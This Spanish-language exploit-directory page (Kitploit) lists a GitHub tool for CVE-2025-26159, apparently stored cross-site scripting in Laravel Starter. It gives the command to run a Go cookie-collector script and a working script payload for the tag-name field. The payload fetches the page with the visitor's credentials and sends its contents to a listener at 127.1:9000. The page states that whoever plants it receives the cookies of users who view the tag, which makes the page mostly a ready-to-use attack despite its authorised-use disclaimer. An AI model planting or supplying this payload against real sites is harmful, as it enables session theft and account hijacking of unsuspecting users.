Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/godbadtry/cve-2025-26159
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubgodbadtry/cve-2025-26159

CVE-2025-26159

Este script decodifica, filtra y extrae cookies como parte de la explotación de CVE-2025-26159.

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-26159

Este script solo puede utilizarse en entornos autorizados donde se haya otorgado permiso explícito. El autor no es responsable de ningún uso indebido, daño o consecuencia derivada del uso de este script.

Este script decodifica, filtra y extrae cookies como parte de la explotación de CVE-2025-26159.

Uso

Para comprender los pasos de explotación, consulta esta publicación en mi blog.

root@kitploit:~
go run CVE-2025-26159.go

En el campo de nombre de etiqueta de laravel starter agrega este payload:

root@kitploit:~
<script>fetch("/",{credentials:"include"}).then(r=>r.text()).then(d=>location='//127.1:9000/d='+escape(d))</script>

Después de que un usuario visite la página de detalle de la etiqueta maliciosa, recibirás sus cookies.

Descargar herramienta